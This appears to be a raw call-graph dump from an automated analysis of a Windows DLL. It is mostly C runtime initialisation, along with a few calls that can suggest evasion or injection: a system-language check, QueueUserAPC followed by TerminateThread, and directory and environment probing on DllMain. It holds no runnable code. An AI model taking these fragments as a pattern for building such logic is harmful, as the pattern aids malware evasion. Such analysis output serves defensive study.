15077->15106 15080 67cd1b3c 15080->15076 15111 67cd1b58 HeapAlloc 15081->15111 15083 67cd136d 15084 67cd13c6 15083->15084 15085 67cd1373 GetModuleFileNameW 15083->15085 15084->15050 15084->15058 15086 67cd13a4 15085->15086 15092 67cd1385 15085->15092 15086->15084 15087 67cd13af 15086->15087 15088 67cd13b6 GetLastError 15086->15088 15087->15084 15114 67cd142f HeapFree 15088->15114 15092->15085 15092->15086 15112 67cd142f HeapFree 15092->15112 15113 67cd1b58 HeapAlloc 15092->15113 15093->15055 15094->15058 15096 67cd1429 15095->15096 15097 67cd13f4 QueueUserAPC 15095->15097 15096->15048 15096->15049 15097->15096 15098 67cd1407 GetLastError TerminateThread CloseHandle SetLastError 15097->15098 15098->15096 15102 67cd16d4 15099->15102 15101 67cd1754 15103 67cd1789 memcpy 15101->15103 15104 67cd1752 15101->15104 15102->15101 15102->15104 15109 67cd1b58 HeapAlloc 15102->15109 15110 67cd142f HeapFree 15102->15110 15103->15104 15104->15077 15107 67cd1ea9 GetSystemDefaultUILanguage VerLanguageNameA 15106->15107 15108 67cd1b27 StrStrIA 15106->15108 15107->15108 15108->15076 15108->15080 15109->15102 15110->15102 15111->15083 15112->15092 15113->15092 15114->15087 15115 67d2cab1 15116 67d2caba 15115->15116 15117 67d2cabf 15115->15117 15133 67d35779 15116->15133 15121 67d2cad4 15117->15121 15120 67d2cacd 15122 67d2cae0 __CRT_INIT@12 15121->15122 15123 67d2cb2e 15122->15123 15132 67d2cb8b __CRT_INIT@12 15122->15132 15137 67d2c93f 15122->15137 15123->15132 15187 67d4eb60 FindFirstChangeNotificationA 15123->15187 15132->15120 15134 67d357a9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 15133->15134 15135 67d3579c 15133->15135 15136 67d357a0 15134->15136 15135->15134 15135->15136 15136->15117 15138 67d2c94b __CRT_INIT@12 15137->15138 15139 67d2c953 15138->15139 15140 67d2c9cd 15138->15140 15195 67d35139 GetProcessHeap 15139->15195 15142 67d2c9d1 15140->15142 15143 67d2ca36 15140->15143 15147 67d2c9f2 15142->15147 15156 67d2c95c __CRT_INIT@12 15142->15156 15296 67d336d7 15142->15296 15145 67d2ca3b 15143->15145 15146 67d2ca99 15143->15146 15144 67d2c958 15144->15156 15196 67d3212f 15144->15196 15327 67d35a1a 15145->15327 15146->15156 15355 67d31fbf 15146->15355 15299 67d3359f RtlDecodePointer 15147->15299 15152 67d2ca46 15152->15156 15330 67d33a00 15152->15330 15154 67d2c968 __RTC_Initialize 15154->15156 15163 67d2c978 GetCommandLineA 15154->15163 15156->15123 15158 67d2ca08 __CRT_INIT@12 15323 67d2ca21 15158->15323 15160 67d3540a __ioterm 42 API calls 15162 67d2ca03 15160->15162 15165 67d321a5 __mtterm 44 API calls 15162->15165 15217 67d35815 GetEnvironmentStringsW 15163->15217 15165->15158 15167 67d2ca6f 15169 67d2ca75 15167->15169 15170 67d2ca8d 15167->15170 15339 67d3207c 15169->15339 15349 67d33da6 15170->15349 15174 67d2c996 15265 67d321a5 15174->15265 15175 67d2c992 15175->15174 15274 67d35469 15175->15274 15176 67d2ca7d GetCurrentThreadId 15176->15156 15179 67d2c9a2 15180 67d2c9b6 15179->15180 15249 67d35698 15179->15249 15186 67d2c9bb 15180->15186 15291 67d3540a 15180->15291 15186->15156 15188 67d4eba2 ___DllMainCRTStartup 15187->15188 15189 67d4ebc0 GetCurrentDirectoryA 15188->15189 15190 67d4ebfa ___DllMainCRTStartup 15189->15190 15191 67d4ecc6 GetEnvironmentVariableA 15190->15191 15192 67d4ed1e ___DllMainCRTStartup 15191->15192 15948 67d4f1f0 15192->15948 15195->15144 15363 67d337ea RtlEncodePointer 15196->15363 15198 67d32134 15370 67d382fe 15198->15370 15201 67d3213d 15203 67d321a5 __mtterm 44 API calls 15201->15203 15205 67d32142 15203->15205 15205->15154 15206 67d3215a 15207 67d33a00 __calloc_crt 41 API calls 15206->15207 15208 67d32167 15207->15208 15209 67d3219c 15208->15209 15210 67d35a39 __CRT_INIT@12 TlsSetValue 15208->15210 15211 67d321a5 __mtterm 44 API calls 15209->15211 15212 67d3217b 15210->15212 15213 67d321a1 15211->15213 15212->15209 15214 67d32181 15212->15214 15213->15154 15215 67d3207c __initptd 41 API calls 15214->15215 15216 67d32189 GetCurrentThreadId 15215->15216 15216->15154 15218 67d35828 WideCharToMultiByte 15217->15218 15219 67d2c988 15217->15219 15221 67d35892 FreeEnvironmentStringsW 15218->15221 15222 67d3585b 15218->15222 15230 67d35156 15219->15230 15221->15219 15382 67d33a48 15222->15382 15225 67d35868 WideCharToMultiByte 15226 67d35887 FreeEnvironmentStringsW 15225->15226 15227 67d3587e 15225->15227 15226->15219 15228 67d33da6 _free 41 API calls 15227->15228 15229 67d35884 15228->15229 15229->15226 15231 67d35162 __CRT_INIT@12 15230->15231 15232 67d381ad __lock 41 API calls 15231->15232 15233 67d35169 15232->15233 15234 67d33a00 __calloc_crt 41 API calls 15233->15234 15236 67d3517a 15234->15236 15235 67d351e5 GetStartupInfoW 15243 67d351fa 15235->15243 15244 67d35329 15235->15244 15236->15235 15237 67d35185 @_EH4_CallFilterFunc@8 __CRT_INIT@12 15236->15237 15237->15175 15238 67d353f1 15601 67d35401 15238->15601 15240 67d33a00 __calloc_crt 41 API calls 15240->15243 15241 67d35376 GetStdHandle 15241->15244 15242 67d35389 GetFileType 15242->15244 15243->15240 15243->15244 15245 67d35248 15243->15245 15244->15238 15244->15241 15244->15242 15248 67d35b24 __mtinitlocks InitializeCriticalSectionAndSpinCount 15244->15248 15245->15244 15246 67d3527c GetFileType 15245->15246 15247 67d35b24 __mtinitlocks InitializeCriticalSectionAndSpinCount 15245->15247 15246->15245 15247->15245 15248->15244 15250 67d356a1 15249->15250 15252 67d356a6 _strlen 15249->15252 15605 67d31677 15250->15605 15253 67d33a00 __calloc_crt 41 API calls 15252->15253 15256 67d2c9ab 15252->15256 15261 67d356dc _strlen 15253->15261 15254 67d3572e 15255 67d33da6 _free 41 API calls 15254->15255 15255->15256 15256->15180 15285 67d336e6 15256->15285 15257 67d33a00 __calloc_crt 41 API calls 15257->15261 15258 67d35755 15260 67d33da6 _free 41 API calls 15258->15260 15260->15256 15261->15254 15261->15256 15261->15257 15261->15258 15262 67d3576c 15261->15262 15609 67d37e29 15261->15609 15263 67d2df12 __invoke_watson 7 API calls 15262->15263 15264 67d35778 15263->15264 15266 67d321af 15265->15266 15268 67d321b5 15265->15268 15807 67d359fb 15266->15807 15269 67d38217 RtlDeleteCriticalSection 15268->15269 15270 67d38233 15268->15270 15271 67d33da6 _free 41 API calls 15269->15271 15272 67d38252 15270->15272 15273 67d3823f RtlDeleteCriticalSection 15270->15273 15271->15268 15272->15156 15273->15270 15275 67d35477 15274->15275 15276 67d3547c GetModuleFileNameA 15274->15276 15277 67d31677 ___initmbctable 53 API calls 15275->15277 15278 67d354a9 15276->15278 15277->15276 15810 67d3551c 15278->15810 15280 67d354fc 15280->15179 15282 67d33a48 __malloc_crt 41 API calls 15283 67d354e2 15282->15283 15283->15280 15284 67d3551c _parse_cmdline 41 API calls 15283->15284 15284->15280 15287 67d336f2 __IsNonwritableInCurrentImage 15285->15287 15822 67d37e0a 15287->15822 15288 67d33710 __initterm_e 15290 67d3372f _doexit __IsNonwritableInCurrentImage 15288->15290 15825 67d2c52c 15288->15825 15290->15180 15294 67d35411 15291->15294 15292 67d2c9cb 15292->15174 15293 67d33da6 _free 41 API calls 15293->15294 15294->15292 15294->15293 15295 67d3542a RtlDeleteCriticalSection 15294->15295 15295->15294 15297 67d3388c _doexit 41 API calls 15296->15297 15298 67d336e2 15297->15298 15298->15147 15300 67d335cb 15299->15300 15301 67d335b9 15299->15301 15302 67d33da6 _free 41 API calls 15300->15302 15301->15300 15303 67d33da6 _free 41 API calls 15301->15303 15304 67d335d8 15302->15304 15303->15301 15305 67d335fc 15304->15305 15308 67d33da6 _free 41 API calls 15304->15308 15306 67d33da6 _free 41 API calls 15305->15306 15307 67d33608 15306->15307 15309 67d33da6 _free 41 API calls 15307->15309 15308->15304 15310 67d33619 15309->15310 15311 67d33da6 _free 41 API calls 15310->15311 15312 67d33624 15311->15312 15313 67d33649 RtlEncodePointer 15312->15313 15317 67d33da6 _free 41 API calls 15312->15317 15314 67d33664 15313->15314 15315 67d3365e 15313->15315 15316 67d3367a 15314->15316 15319 67d33da6 _free 41 API calls 15314->15319 15318 67d33da6 _free 41 API calls 15315->15318 15320 67d2c9f7 15316->15320 15322 67d33da6 _free 41 API calls 15316->15322 15321 67d33648 15317->15321 15318->15314 15319->15316 15320->15158 15320->15160 15321->15313 15322->15320 15324 67d2ca33 15323->15324 15325 67d2ca25 15323->15325 15324->15156 15325->15324 15326 67d321a5 __mtterm 44 API calls 15325->15326 15326->15324 15328 67d35a31 TlsGetValue 15327->15328 15329 67d35a2d 15327->15329 15328->15152 15329->15152 15332 67d33a07 15330->15332 15333 67d2ca57 15332->15333 15335 67d33a25 15332->15335 15891 67d3f87c 15332->15891 15333->15156 15336 67d35a39 15333->15336 15335->15332 15335->15333 15899 67d35eaf Sleep 15335->15899 15337 67d35a53 TlsSetValue 15336->15337 15338 67d35a4f 15336->15338 15337->15167 15338->15167 15340 67d32088 __CRT_INIT@12 15339->15340 15341 67d381ad __lock 41 API calls 15340->15341 15342 67d320c5 15341->15342 15900 67d3211d 15342->15900 15345 67d381ad __lock 41 API calls 15346 67d320e6 ___addlocaleref 15345->15346 15903 67d32126 15346->15903 15348 67d32111 __CRT_INIT@12 15348->15176 15350 67d33daf HeapFree 15349->15350 15351 67d33dd8 _rand_s 15349->15351 15350->15351 15352 67d33dc4 15350->15352 15351->15156 15353 67d30e90 _rand_s 39 API calls 15352->15353 15354 67d33dca GetLastError 15353->15354 15354->15351 15357 67d31fcc 15355->15357 15362 67d31ff2 15355->15362 15356 67d31fda 15358 67d35a39 __CRT_INIT@12 TlsSetValue 15356->15358 15357->15356 15359 67d35a1a __CRT_INIT@12 TlsGetValue 15357->15359 15360 67d31fea 15358->15360 15359->15356 15908 67d31e8a 15360->15908 15362->15156 15377 67d34f79 15363->15377 15365 67d337fb __init_pointers __initp_misc_winsig 15378 67d3601b RtlEncodePointer 15365->15378 15367 67d33813 __init_pointers 15368 67d35b92 GetModuleHandleW 15367->15368 15369 67d35baf 15368->15369 15369->15198 15373 67d3830a 15370->15373 15372 67d32139 15372->15201 15374 67d359dd 15372->15374 15373->15372 15379 67d35b24 15373->15379 15375 67d359f4 TlsAlloc 15374->15375 15376 67d3214f 15374->15376 15376->15201 15376->15206 15377->15365 15378->15367 15380 67d35b41 InitializeCriticalSectionAndSpinCount 15379->15380 15381 67d35b34 15379->15381 15380->15373 15381->15373 15384 67d33a56 15382->15384 15385 67d33a88 15384->15385 15387 67d34e76 15384->15387 15403 67d35eaf Sleep 15384->15403 15385->15221 15385->15225 15388 67d34ef1 15387->15388 15395 67d34e82 15387->15395 15389 67d34f53 _malloc RtlDecodePointer 15388->15389 15390 67d34ef7 15389->15390 15392 67d30e90 _rand_s 40 API calls 15390->15392 15402 67d34ee9 15392->15402 15393 67d34eb5 RtlAllocateHeap 15393->15395 15393->15402 15395->15393 15396 67d34edd 15395->15396 15400 67d34edb 15395->15400 15404 67d3ef0d 15395->15404 15413 67d3ef6c 15395->15413 15445 67d33589 15395->15445 15448 67d34f53 RtlDecodePointer 15395->15448 15450 67d30e90 15396->15450 15401 67d30e90 _rand_s 40 API calls 15400->15401 15401->15402 15402->15384 15403->15384 15453 67d483c2 15404->15453 15406 67d3ef14 15407 67d3ef21 15406->15407 15408 67d483c2 __NMSG_WRITE 41 API calls 15406->15408 15409 67d3ef6c __NMSG_WRITE 41 API calls 15407->15409 15411 67d3ef43 15407->15411 15408->15407 15410 67d3ef39 15409->15410 15412 67d3ef6c __NMSG_WRITE 41 API calls 15410->15412 15411->15395 15412->15411 15414 67d3ef8a __NMSG_WRITE 15413->15414 15415 67d483c2 __NMSG_WRITE 38 API calls 15414->15415 15444 67d3f0b1 15414->15444 15417 67d3ef9d 15415->15417 15419 67d3f0b6 GetStdHandle 15417->15419 15420 67d483c2 __NMSG_WRITE 38 API calls 15417->15420 15418 67d3f11a 15418->15395 15423 67d3f0c4 _strlen 15419->15423 15419->15444 15421 67d3efae 15420->15421 15421->15419 15422 67d3efc0 15421->15422 15422->15444 15475 67d3d991 15422->15475 15425 67d3f0fd WriteFile 15423->15425 15423->15444 15425->15444 15427 67d3f11e 15430 67d2df12 __invoke_watson 7 API calls 15427->15430 15428 67d3efed GetModuleFileNameW 15429 67d3f00d 15428->15429 15434 67d3f01d _GetLocaleNameFromLangCountry 15428->15434 15431 67d3d991 ___crtDownlevelLCIDToLocaleName 38 API calls 15429->15431 15432 67d3f128 15430->15432 15431->15434 15530 67d31ff5 15432->15530 15434->15427 15439 67d3f063 15434->15439 15484 67d3daa6 15434->15484 15439->15427 15493 67d3d8e7 15439->15493 15440 67d3d8e7 __wsetlocale_get_all 38 API calls 15441 67d3f09a 15440->15441 15441->15427 15442 67d3f0a1 15441->15442 15502 67d48402 15442->15502 15523 67d2b899 15444->15523 15598 67d33555 GetModuleHandleExW 15445->15598 15449 67d34f66 15448->15449 15449->15395 15451 67d3200d __getptd_noexit 41 API calls 15450->15451 15452 67d30e95 15451->15452 15452->15400 15454 67d483cc 15453->15454 15455 67d483d6 15454->15455 15456 67d30e90 _rand_s 41 API calls 15454->15456 15455->15406 15457 67d483f2 15456->15457 15460 67d2dee7 15457->15460 15463 67d2debc RtlDecodePointer 15460->15463 15464 67d2decf 15463->15464 15469 67d2df12 15464->15469 15467 67d2debc _rand_s 7 API calls 15468 67d2def3 15467->15468 15468->15406 15470 67d2df19 15469->15470 15471 67d2dd7d __invoke_watson 7 API calls 15470->15471 15472 67d2df32 15471->15472 15473 67d35ebd __invoke_watson GetCurrentProcess TerminateProcess 15472->15473 15474 67d2dee6 15473->15474 15474->15467 15476 67d3d9aa 15475->15476 15477 67d3d99c 15475->15477 15478 67d30e90 _rand_s 41 API calls 15476->15478 15477->15476 15482 67d3d9c3 15477->15482 15479 67d3d9b4 15478->15479 15480 67d2dee7 _rand_s 8 API calls 15479->15480 15481 67d3d9be 15480->15481 15481->15427 15481->15428 15482->15481 15483 67d30e90 _rand_s 41 API calls 15482->15483 15483->15479 15488 67d3dab4 15484->15488 15485 67d3dab8 15486 67d3dabd 15485->15486 15487 67d30e90 _rand_s 41 API calls 15485->15487 15486->15439 15489 67d3dae8 15487->15489 15488->15485 15488->15486 15491 67d3daf7 15488->15491 15490 67d2dee7 _rand_s 8 API calls 15489->15490 15490->15486 15491->15486 15492 67d30e90 _rand_s 41 API calls 15491->15492 15492->15489 15494 67d3d901 15493->15494 15496 67d3d8f3 15493->15496 15495 67d30e90 _rand_s 41 API calls 15494->15495 15501 67d3d90b 15495->15501 15496->15494 15499 67d3d92d 15496->15499 15497 67d2dee7 _rand_s 8 API calls 15498 67d3d915 15497->15498 15498->15427 15498->15440 15499->15498 15500 67d30e90 _rand_s 41 API calls 15499->15500 15500->15501 15501->15497 15503 67d4842c ___crtIsPackagedApp 15502->15503 15504 67d484f5 IsDebuggerPresent 15503->15504 15505 67d48445 LoadLibraryExW 15503->15505 15508 67d484ff 15504->15508 15509 67d4851a 15504->15509 15506 67d48482 GetProcAddress 15505->15506 15507 67d4845c GetLastError 15505->15507 15512 67d48496 GetProcAddress 15506->15512 15514 67d4850d 15506->15514 15510 67d4846b LoadLibraryExW 15507->15510 15507->15514 15511 67d48506 OutputDebugStringW 15508->15511 15508->15514 15513 67d4851f RtlDecodePointer 15509->15513 15509->15514 15510->15506 15510->15514 15511->15514 15518 67d484ad GetProcAddress 15512->15518 15513->15514 15515 67d2b899 __output_s_l 6 API calls 15514->15515 15517 67d485e4 15515->15517 15517->15444 15519 67d484c1 GetProcAddress 15518->15519 15520 67d484d5 15519->15520 15521 67d484ed 15520->15521 15522 67d484de GetProcAddress 15520->15522 15521->15504 15522->15521 15524 67d2b8a3 IsProcessorFeaturePresent 15523->15524 15525 67d2b8a1 15523->15525 15527 67d2da87 15524->15527 15525->15418 15535 67d2da36 IsDebuggerPresent 15527->15535 15543 67d3200d GetLastError 15530->15543 15532 67d31ffb 15533 67d32008 15532->15533 15557 67d336ac 15532->15557 15533->15395 15536 67d2da4b ___raise_securityfailure 15535->15536 15541 67d35ed2 SetUnhandledExceptionFilter UnhandledExceptionFilter 15536->15541 15539 67d2da53 ___raise_securityfailure 15542 67d35ebd GetCurrentProcess TerminateProcess 15539->15542 15540 67d2da70 15540->15418 15541->15539 15542->15540 15544 67d35a1a __CRT_INIT@12 TlsGetValue 15543->15544 15545 67d32022 15544->15545 15546 67d32070 SetLastError 15545->15546 15547 67d33a00 __calloc_crt 38 API calls 15545->15547 15546->15532 15548 67d32035 15547->15548 15548->15546 15549 67d35a39 __CRT_INIT@12 TlsSetValue 15548->15549 15550 67d32049 15549->15550 15551 67d32067 15550->15551 15552 67d3204f 15550->15552 15554 67d33da6 _free 38 API calls 15551->15554 15553 67d3207c __initptd 38 API calls 15552->15553 15555 67d32057 GetCurrentThreadId 15553->15555 15556 67d3206d 15554->15556 15555->15546 15556->15546 15558 67d3ef0d __FF_MSGBANNER 41 API calls 15557->15558 15559 67d336b4 15558->15559 15560 67d3ef6c __NMSG_WRITE 41 API calls 15559->15560 15561 67d336bc 15560->15561 15566 67d3376a 15561->15566 15565 67d336d3 15565->15533 15567 67d3388c _doexit 41 API calls 15566->15567 15568 67d336c7 15567->15568 15569 67d3388c 15568->15569 15570 67d33898 __CRT_INIT@12 15569->15570 15585 67d381ad 15570->15585 15574 67d339b5 __CRT_INIT@12 15574->15565 15575 67d33958 _doexit 15592 67d339a6 15575->15592 15577 67d3399d 15578 67d339a6 15577->15578 15579 67d33589 __heap_alloc 3 API calls 15577->15579 15580 67d339b3 15578->15580 15597 67d38337 RtlLeaveCriticalSection 15578->15597 15579->15578 15580->15565 15582 67d33901 RtlEncodePointer 15584 67d3389f 15582->15584 15583 67d33915 RtlEncodePointer 15583->15584 15584->15575 15584->15582 15584->15583 15586 67d381d1 RtlEnterCriticalSection 15585->15586 15587 67d381be 15585->15587 15586->15584 15588 67d38255 __mtinitlocknum 40 API calls 15587->15588 15589 67d381c4 15588->15589 15589->15586 15590 67d336ac __amsg_exit 40 API calls 15589->15590 15591 67d381d0 15590->15591 15591->15586 15593 67d33986 15592->15593 15594 67d339ac 15592->15594 15593->15574 15596 67d38337 RtlLeaveCriticalSection 15593->15596 15595 67d38337 _doexit RtlLeaveCriticalSection 15594->15595 15595->15593 15596->15577 15597->15580 15599 67d33580 ExitProcess 15598->15599 15600 67d3356e GetProcAddress 15598->15600 15600->15599 15604 67d38337 RtlLeaveCriticalSection 15601->15604 15603 67d35408 15603->15237 15604->15603 15606 67d31687 15605->15606 15607 67d31680 15605->15607 15606->15252 15618 67d31a05 15607->15618 15610 67d37e42 15609->15610 15611 67d37e34 15609->15611 15612 67d30e90 _rand_s 41 API calls 15610->15612 15611->15610 15615 67d37e58 15611->15615 15617 67d37e49 15612->15617 15613 67d2dee7 _rand_s 8 API calls 15614 67d37e53 15613->15614 15614->15261 15615->15614 15616 67d30e90 _rand_s 41 API calls 15615->15616 15616->15617 15617->15613 15619 67d31a11 __CRT_INIT@12 15618->15619 15620 67d31ff5 __write_nolock 41 API calls 15619->15620 15621 67d31a19 15620->15621 15643 67d3192e 15621->15643 15623 67d31a23 15655 67d316cf 15623->15655 15626 67d33a48 __malloc_crt 41 API calls 15627 67d31a45 15626->15627 15638 67d31b72 __CRT_INIT@12 15627->15638 15662 67d31bad 15627->15662 15630 67d31b82 15633 67d31b95 15630->15633 15635 67d33da6 _free 41 API calls 15630->15635 15630->15638 15631 67d31a7b 15632 67d31a9b 15631->15632 15634 67d33da6 _free 41 API calls 15631->15634 15637 67d381ad __lock 41 API calls 15632->15637 15632->15638 15636 67d30e90 _rand_s 41 API calls 15633->15636 15634->15632 15635->15633 15636->15638 15639 67d31aca 15637->15639 15638->15606 15640 67d31b58 15639->15640 15642 67d33da6 _free 41 API calls 15639->15642 15672 67d31b77 15640->15672 15642->15640 15644 67d3193a __CRT_INIT@12 15643->15644 15645 67d31ff5 __write_nolock 41 API calls 15644->15645 15646 67d31944 15645->15646 15647 67d381ad __lock 41 API calls 15646->15647 15653 67d31956 15646->15653 15649 67d31974 15647->15649 15648 67d319a1 15675 67d319cb 15648->15675 15649->15648 15654 67d33da6 _free 41 API calls 15649->15654 15650 67d336ac __amsg_exit 41 API calls 15652 67d31964 __CRT_INIT@12 15650->15652 15652->15623 15653->15650 15653->15652 15654->15648 15679 67d2c0bb 15655->15679 15658 67d31700 15660 67d31717 15658->15660 15661 67d31705 GetACP 15658->15661 15659 67d316ee GetOEMCP 15659->15660 15660->15626 15660->15638 15661->15660 15663 67d316cf getSystemCP 43 API calls 15662->15663 15664 67d31bca 15663->15664 15667 67d31c1b IsValidCodePage 15664->15667 15669 67d31bd1 setSBCS 15664->15669 15671 67d31c40 _memset __setmbcp_nolock 15664->15671 15665 67d2b899 __output_s_l 6 API calls 15666 67d31a6c 15665->15666 15666->15630 15666->15631 15668 67d31c2d GetCPInfo 15667->15668 15667->15669 15668->15669 15668->15671 15669->15665 15740 67d3179c GetCPInfo 15671->15740 15806 67d38337 RtlLeaveCriticalSection 15672->15806 15674 67d31b7e 15674->15638 15678 67d38337 RtlLeaveCriticalSection 15675->15678 15677 67d319d2 15677->15653 15678->15677 15680 67d2c0cc 15679->15680 15686 67d2c119 15679->15686 15681 67d31ff5 __write_nolock 41 API calls 15680->15681 15682 67d2c0d2 15681->15682 15683 67d2c0f9 15682->15683 15687 67d315ac 15682->15687 15685 67d3192e __setmbcp 41 API calls 15683->15685 15683->15686 15685->15686 15686->15658 15686->15659 15688 67d315b8 __CRT_INIT@12 15687->15688 15689 67d31ff5 __write_nolock 41 API calls 15688->15689 15690 67d315c1 15689->15690 15691 67d315f0 15690->15691 15693 67d315d4 15690->15693 15692 67d381ad __lock 41 API calls 15691->15692 15694 67d315f7 15692->15694 15695 67d31ff5 __write_nolock 41 API calls 15693->15695 15702 67d3162c 15694->15702 15697 67d315d9 15695->15697 15700 67d315e7 __CRT_INIT@12 15697->15700 15701 67d336ac __amsg_exit 41 API calls 15697->15701 15700->15683 15701->15700 15703 67d31637 ___addlocaleref ___removelocaleref 15702->15703 15705 67d3160b 15702->15705 15703->15705 15709 67d313b2 15703->15709 15706 67d31623 15705->15706 15739 67d38337 RtlLeaveCriticalSection 15706->15739 15708 67d3162a 15708->15697 15710 67d3142b 15709->15710 15715 67d313c7 15709->15715 15711 67d31478 15710->15711 15712 67d33da6 _free 41 API calls 15710->15712 15713 67d39444 ___free_lc_time 41 API calls 15711->15713 15734 67d314a1 15711->15734 15714 67d3144c 15712->15714 15716 67d31496 15713->15716 15719 67d33da6 _free 41 API calls 15714->15719 15715->15710 15717 67d313f8 15715->15717 15721 67d33da6 _free 41 API calls 15715->15721 15722 67d33da6 _free 41 API calls 15716->15722 15718 67d31416 15717->15718 15728 67d33da6 _free 41 API calls 15717->15728 15720 67d33da6 _free 41 API calls 15718->15720 15724 67d3145f 15719->15724 15725 67d31420 15720->15725 15726 67d313ed 15721->15726 15722->15734 15723 67d31500 15727 67d33da6 _free 41 API calls 15723->15727 15729 67d33da6 _free 41 API calls 15724->15729 15730 67d33da6 _free 41 API calls 15725->15730 15731 67d38d02 ___free_lconv_mon 41 API calls 15726->15731 15732 67d31506 15727->15732 15733 67d3140b 15728->15733 15735 67d3146d 15729->15735 15730->15710 15731->15717 15732->15705 15736 67d391d7 ___free_lconv_num 41 API calls 15733->15736 15734->15723 15737 67d33da6 41 API calls _free 15734->15737 15738 67d33da6 _free 41 API calls 15735->15738 15736->15718 15737->15734 15738->15711 15739->15708 15741 67d3187e 15740->15741 15747 67d317d4 15740->15747 15744 67d2b899 __output_s_l 6 API calls 15741->15744 15746 67d3192a 15744->15746 15746->15669 15750 67d3a3fe 15747->15750 15749 67d3a2a2 ___crtLCMapStringA 45 API calls 15749->15741 15751 67d2c0bb _LocaleUpdate::_LocaleUpdate 41 API calls 15750->15751 15752 67d3a40f 15751->15752 15760 67d3a306 15752->15760 15755 67d3a2a2 15756 67d2c0bb _LocaleUpdate::_LocaleUpdate 41 API calls 15755->15756 15757 67d3a2b3 15756->15757 15777 67d3a059 15757->15777 15761 67d3a320 15760->15761 15762 67d3a32d MultiByteToWideChar 15760->15762 15761->15762 15763 67d3a352 15762->15763 15766 67d3a359 15762->15766 15764 67d2b899 __output_s_l 6 API calls 15763->15764 15765 67d31835 15764->15765 15765->15755 15767 67d34e76 _malloc 41 API calls 15766->15767 15769 67d3a37b _memset __crtGetStringTypeA_stat 15766->15769 15767->15769 15768 67d3a3b7 MultiByteToWideChar 15770 67d3a3e1 15768->15770 15771 67d3a3d1 GetStringTypeW 15768->15771 15769->15763 15769->15768 15773 67d3a2e8 15770->15773 15771->15770 15774 67d3a2f2 15773->15774 15775 67d3a303 15773->15775 15774->15775 15776 67d33da6 _free 41 API calls 15774->15776 15775->15763 15776->15775 15779 67d3a072 MultiByteToWideChar 15777->15779 15785 67d3a0d8 15779->15785 15791 67d3a0d1 15779->15791 15780 67d2b899 __output_s_l 6 API calls 15781 67d31856 15780->15781 15781->15749 15782 67d3a137 MultiByteToWideChar 15783 67d3a19e 15782->15783 15784 67d3a150 15782->15784 15788 67d3a2e8 __freea 41 API calls 15783->15788 15802 67d3ee53 15784->15802 15786 67d34e76 _malloc 41 API calls 15785->15786 15789 67d3a100 __crtGetStringTypeA_stat 15785->15789 15786->15789 15788->15791 15789->15782 15789->15791 15790 67d3a164 15790->15783 15792 67d3a17a 15790->15792 15794 67d3a1a6 15790->15794 15791->15780 15792->15783 15793 67d3ee53 __crtLCMapStringA_stat LCMapStringW 15792->15793 15793->15783 15797 67d34e76 _malloc 41 API calls 15794->15797 15800 67d3a1ce __crtGetStringTypeA_stat 15794->15800 15795 67d3ee53 __crtLCMapStringA_stat LCMapStringW 15796 67d3a211 15795->15796 15798 67d3a239 15796->15798 15801 67d3a22b WideCharToMultiByte 15796->15801 15797->15800 15799 67d3a2e8 __freea 41 API calls 15798->15799 15799->15783 15800->15783 15800->15795 15801->15798 15803 67d3ee7e __crtLCMapStringA_stat 15802->15803 15804 67d3ee63 15802->15804 15805 67d3ee95 LCMapStringW 15803->15805 15804->15790 15805->15790 15806->15674 15808 67d35a12 TlsFree 15807->15808 15809 67d35a0e 15807->15809 15808->15268 15809->15268 15812 67d3553e 15810->15812 15815 67d355a2 15812->15815 15816 67d45d54 15812->15816 15813 67d354bf 15813->15280 15813->15282 15814 67d45d54 _parse_cmdline 41 API calls 15814->15815 15815->15813 15815->15814 15819 67d45b3a 15816->15819 15820 67d2c0bb _LocaleUpdate::_LocaleUpdate 41 API calls 15819->15820 15821 67d45b4c 15820->15821 15821->15812 15823 67d37e0d RtlEncodePointer 15822->15823 15823->15823 15824 67d37e27 15823->15824 15824->15288 15828 67d2c430 15825->15828 15827 67d2c537 15827->15290 15829 67d2c43c __CRT_INIT@12 15828->15829 15836 67d3387a 15829->15836 15835 67d2c463 __CRT_INIT@12 15835->15827 15837 67d381ad __lock 41 API calls 15836->15837 15838 67d2c445 15837->15838 15839 67d2c474 15838->15839 15841 67d2c489 15839->15841 15840 67d2c451 15850 67d2c46e 15840->15850 15841->15840 15853 67d339cf 15841->15853 15843 67d2c504 RtlEncodePointer RtlEncodePointer 15843->15840 15844 67d2c4b3 15844->15843 15845 67d2c4d8 15844->15845 15860 67d33a8f 15844->15860 15845->15840 15847 67d33a8f __realloc_crt 44 API calls 15845->15847 15848 67d2c4f2 RtlEncodePointer 15845->15848 15849 67d2c4ec 15847->15849 15848->15843 15849->15840 15849->15848 15887 67d33883 15850->15887 15854 67d339d8 15853->15854 15855 67d339ed RtlSizeHeap 15853->15855 15856 67d30e90 _rand_s 41 API calls 15854->15856 15855->15844 15857 67d339dd 15856->15857 15858 67d2dee7 _rand_s 8 API calls 15857->15858 15859 67d339e8 15858->15859 15859->15844 15864 67d33a96 15860->15864 15862 67d33ad3 15862->15845 15864->15862 15865 67d3f768 15864->15865 15886 67d35eaf Sleep 15864->15886 15866 67d3f771 15865->15866 15867 67d3f77c 15865->15867 15868 67d34e76 _malloc 41 API calls 15866->15868 15869 67d3f784 15867->15869 15880 67d3f791 15867->15880 15870 67d3f779 15868->15870 15871 67d33da6 _free 41 API calls 15869->15871 15870->15864 15885 67d3f78c _rand_s 15871->15885 15872 67d3f7c9 15874 67d34f53 _malloc RtlDecodePointer 15872->15874 15873 67d3f799 RtlReAllocateHeap 15873->15880 15873->15885 15875 67d3f7cf 15874->15875 15877 67d30e90 _rand_s 41 API calls 15875->15877 15876 67d3f7f9 15879 67d30e90 _rand_s 41 API calls 15876->15879 15877->15885 15878 67d34f53 _malloc RtlDecodePointer 15878->15880 15881 67d3f7fe GetLastError 15879->15881 15880->15872 15880->15873 15880->15876 15880->15878 15882 67d3f7e1 15880->15882 15881->15885 15883 67d30e90 _rand_s 41 API calls 15882->15883 15884 67d3f7e6 GetLastError 15883->15884 15884->15885 15885->15864 15886->15864 15890 67d38337 RtlLeaveCriticalSection 15887->15890 15889 67d2c473 15889->15835 15890->15889 15892 67d3f887 15891->15892 15898 67d3f8a2 15891->15898 15893 67d3f893 15892->15893 15892->15898 15894 67d30e90 _rand_s 40 API calls 15893->15894 15896 67d3f898 15894->15896 15895 67d3f8b2 RtlAllocateHeap 15895->15896 15895->15898 15896->15332 15897 67d34f53 _malloc RtlDecodePointer 15897->15898 15898->15895 15898->15896 15898->15897 15899->15335 15906 67d38337 RtlLeaveCriticalSection 